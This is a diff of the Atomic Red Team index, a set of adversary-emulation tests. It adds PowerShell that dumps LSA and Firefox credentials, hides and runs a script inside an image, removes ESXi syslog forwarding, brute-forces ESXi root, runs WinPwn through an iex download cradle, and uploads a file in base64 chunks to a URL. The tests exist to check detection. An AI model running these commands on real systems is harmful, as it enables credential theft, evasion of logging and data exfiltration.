+        obfuscation via steganography, enabling attackers to clandestinely transfer
+        files across systems undetected. \nBy embedding the tarball file within the
+        image, adversaries can obscure their activities, facilitating covert communication
+        and data exfiltration.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Image file which will be downloaded to be used to hide data
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+        tar_file:
+          description: Tarz file containing random passwords
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002.tarz"
+        new_image_file:
+          description: new image file ready for extraction
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002New.jpg"
+        passwords_file:
+          description: Text file containing random passwords
+          type: path
+          default: "$env:TEMP\\random_passwords.txt"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: 'File to hide within tarz file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: "Write-Output \"Generating random passwords and saving
+          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
+          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
+          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+      - description: "Tarz file to embed in image must exist \n"
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount
+          0 | Set-Content "#{new_image_file}" -Encoding byte
+
+          '
+        cleanup_command: |
+          Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+          Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+    - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+      auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+      description: "This atomic test demonstrates the technique of data obfuscation
+        via steganography, where a PowerShell script is concealed within an image
+        file. \nThe PowerShell script is embedded using steganography techniques,
+        making it undetectable by traditional security measures. The script is hidden
+        \nwithin the pixels of the image, enabling attackers to covertly transfer
+        and execute malicious code across systems.\n\nThe test begins by ensuring
+        the availability of the malicious image file and the Extract-Invoke-PSImage
+        script. The test proceeds to extract the hidden \nPowerShell script (decoded.ps1)
+        from the image file using the Extract-Invoke-PSImage tool. The extracted script
+        is then decoded from base64 encoding and saved as a \nseparate PowerShell
+        (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.\n\nIn
+        the case of this atomic test, the malicious image file which is downloaded
+        has the powershell command Start-Process notepad embedded within in base64.
+        This\nis done to emulate an attackers behaviour in the case they were to execute
+        malware embedded within the image file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Malicious Image file which will be downloaded
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+        psimage_script:
+          description: Extract-Invoke-PSImage Script downloaded
+          type: path
+          default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: 'Extract-Invoke-PSImage must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "cd \"PathToAtomicsFolder\\ExternalPayloads\\\"\nImport-Module .\\Extract-Invoke-PSImage.ps1\n$extractedScript=Extract-Invoke-PSImage
+          -Image \"#{image_file}\" -Out \"$HOME\\result.ps1\"\n$scriptContent = Get-Content
+          \"$HOME\\result.ps1\" -Raw\n$base64Pattern = \"(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])\"\n$base64Strings
+          = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value
+          }\n$base64Strings | Set-Content \"$HOME\\decoded.ps1\"\n$decodedContent
+          = Get-Content \"$HOME\\decoded.ps1\" -Raw\n$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))\n$textPattern
+          = '^.+'  \n$textMatches = [regex]::Matches($decodedText, $textPattern) |
+          ForEach-Object { $_.Value }\n$scriptPath = \"$HOME\\textExtraction.ps1\"\n$textMatches
+          -join '' | Set-Content -Path $scriptPath\n. \"$HOME\\textExtraction.ps1\"\n"
+        cleanup_command: "Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction
+          Ignore\nRemove-Item -Path \"$HOME\\result.ps1\" -Force -ErrorAction Ignore
+          \nRemove-Item -Path \"$HOME\\textExtraction.ps1\" -Force -ErrorAction Ignore\nRemove-Item
+          -Path \"$HOME\\decoded.ps1\" -Force -ErrorAction Ignore\n"
  T1008:
    technique:
      x_mitre_platforms:
@@ -74546,6 +75168,65 @@ collection:
        cleanup_command: 'rm -rf #{input_folder}'
        name: bash
        elevation_required: false
+    - name: ESXi - Remove Syslog remote IP
+      auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+      description: 'An adversary may edit the syslog config to remove the loghost
+        in order to prevent or redirect logs being received by SIEM.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: Username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "# Extract line with IP address from the syslog configuration output\n#{plink_file}
+          -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt
+          | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n#
+          Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username}
+          -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n#
+          Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath
+          = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath
+          -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n    Write-Host
+          \"The content is $fileContent\"\n    Write-Host \"The file is empty\"\n}
+          else {\n    # Use a regular expression to extract IP addresses\n    $ipAddresses
+          = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n
+          \   \n    $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n
+          \   $output | Out-File -FilePath $outputFilePath -Encoding ascii\n    \n
+          \   Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n"
+        cleanup_command: |
+          # Re-add the initially extracted IP
+          #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+          rm c:\temp\loghost_ip.txt
+          rm c:\temp\loghost.txt
+        name: powershell
+        elevation_required: true
  T1113:
    technique:
      modified: '2023-03-30T21:01:39.967Z'
@@ -81852,6 +82533,46 @@ credential-access:
        cleanup_command: 'rmuser -y art

          '
+    - name: ESXi - Brute Force Until Account Lockout
+      auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+      description: |
+        An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+        In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        lockout_threshold:
+          description: Specify the account lockout threshold configured on the ESXI
+            management server
+          type: string
+          default: '5'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: |
+          $lockout_threshold = [int]"#{lockout_threshold}"
+          for ($var = 1; $var -le $lockout_threshold; $var++) {
+            #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+            }
+        name: powershell
+        elevation_required: false
  T1003:
    technique:
      x_mitre_platforms:
@@ -82399,44 +83120,51 @@ credential-access:
        elevation_required: true
    - name: Registry parse with pypykatz
      auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-      description: 'Parses registry hives to obtain stored credentials
+      description: |
+        Parses registry hives to obtain stored credentials.

-        '
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "Python 3 must be installed manually"
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
-      - description: 'Computer must have pip installed
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "PIP must be installed manually"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-      - description: 'pypykatz must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live registry
-
-          '
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
        name: command_prompt
        elevation_required: true
    - name: esentutl.exe SAM copy
@@ -85363,14 +86091,16 @@ credential-access:
      auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
      description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
        Firefox) passwords.\nUpon successful execution, the decrypted credentials
-        will be output to a text file, as well as displayed on screen. \n"
+        will be output to a text file, as well as displayed on screen. \n\nWill create
+        a Python virtual environment within the External Payloads folder that can
+        be deleted manually post test execution.\n"
      supported_platforms:
      - windows
      input_arguments:
        Firepwd_Path:
          description: Filepath for Firepwd.py
          type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
        Out_Filepath:
          description: Filepath to output results to
          type: string
@@ -85383,17 +86113,12 @@ credential-access:
          description: Filepath to python
          type: string
          default: C:\Program Files\Python310\python.exe
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
      dependency_executor_name: powershell
      dependencies:
-      - description: 'Firepwd must exist at #{Firepwd_Path}
-
-          '
-        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: 'Firefox profile directory must be present

          '
@@ -85429,36 +86154,52 @@ credential-access:
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Pip must be installed.
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: 'Firepwd must exist at #{Firepwd_Path}
+
+          '
+        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: "Pycryptodome library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pycryptodome) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe
+          install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" |
+          out-null} else {write-host "Visual Studio Build Tools (C++ Support) must
+          be installed to continue gathering this prereq"}
+
+          '
      - description: "Pyasn1 library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pyasn1) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe
+          install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null}
+          else {write-host "Visual Studio Build Tools (C++ Support) must be installed
+          to continue gathering this prereq."}
+
+          '
      executor:
        name: powershell
        command: |
          $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-          cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+          cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
          cat #{Out_Filepath}
        cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
          \  \n"
@@ -86756,42 +87497,50 @@ credential-access:
        Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

        Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'pypykatz must be installed and part of PATH
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live lsa
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
+        cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul

          '
        name: command_prompt
@@ -90793,6 +91542,24 @@ credential-access:
          mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
        name: command_prompt
        elevation_required: true
+    - name: Create Volume Shadow Copy with diskshadow
+      auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+      description: |
+        This test is intended to be run on a domain controller
+        An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the script
+          type: Path
+          default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+      executor:
+        command: |
+          mkdir c:\exfil
+          diskshadow.exe /s #{filename}
+        name: command_prompt
+        elevation_required: true
  T1558.003:
    technique:
      modified: '2023-03-30T21:01:46.538Z'
@@ -94910,6 +95677,15 @@ discovery:
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          printercheck -noninteractive -consoleoutput
        name: powershell
+    - name: Peripheral Device Discovery via fsutil
+      auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
+      description: Performs pheripheral device discovery utilizing fsutil to list
+        all drives.
+      supported_platforms:
+      - windows
+      executor:
+        command: fsutil fsinfo drives
+        name: command_prompt
  T1082:
    technique:
      modified: '2023-03-30T21:01:40.871Z'
@@ -97537,6 +98313,20 @@ discovery:
          Ignore"
        name: powershell
        elevation_required: true
+    - name: Enumerate Windows Security Log via WevtUtil
+      auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd
+      description: "WevtUtil is a command line tool that can be utilised by adversaries
+        to gather intelligence on a targeted Windows system's logging infrastructure.
+        \n\nBy executing this command, malicious actors can enumerate all available
+        event logs, including both default logs such as Application, Security, and
+        System\nas well as any custom logs created by administrators. \n\nThis information
+        provides valuable insight into the system's logging mechanisms, potentially
+        allowing attackers to identify gaps or weaknesses in the logging configuration"
+      supported_platforms:
+      - windows
+      executor:
+        command: wevtutil enum-logs
+        name: command_prompt
  T1087.004:
    technique:
      x_mitre_platforms:
@@ -99295,40 +100085,47 @@ discovery:
          description: hostname or ip address to connect to.
          type: string
          default: 192.168.1.1
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit
+          1 }

          '
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'adidnsdump must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      - description: 'adidnsdump must be installed

          '
-        get_prereq_command: 'pip3 install adidnsdump
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          adidnsdump 2>&1 | Out-Null

          '
      executor:
-        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+        command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass}
+          --print-zones #{host_name}

          '
        name: command_prompt
@@ -99769,7 +100566,8 @@ discovery:
      - description: 'Check if python exists on the machine

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
@@ -111983,6 +112781,38 @@ exfiltration:

          '
        name: sh
+    - name: Network-Based Data Transfer in Small Chunks
+      auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+      description: Simulate transferring data over a network in small chunks to evade
+        detection.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_file_path:
+          description: Path to the source file to transfer.
+          type: path
+          default: "[User specified]"
+        destination_url:
+          description: URL of the destination server.
+          type: url
+          default: http://example.com
+        chunk_size:
+          description: Size of each data chunk (in KB).
+          type: integer
+          default: 1024
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $file = [System.IO.File]::OpenRead(#{source_file_path})
+          $chunkSize = #{chunk_size} * 1KB
+          $buffer = New-Object Byte[] $chunkSize
+
+          while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+              $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+              Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+          }
+          $file.Close()
  T1537:
    technique:
      x_mitre_platforms:
@@ -2032,7 +2032,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -2107,6 +2107,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -10549,7 +10550,7 @@ defense-evasion:
  T1562.003:
    technique:
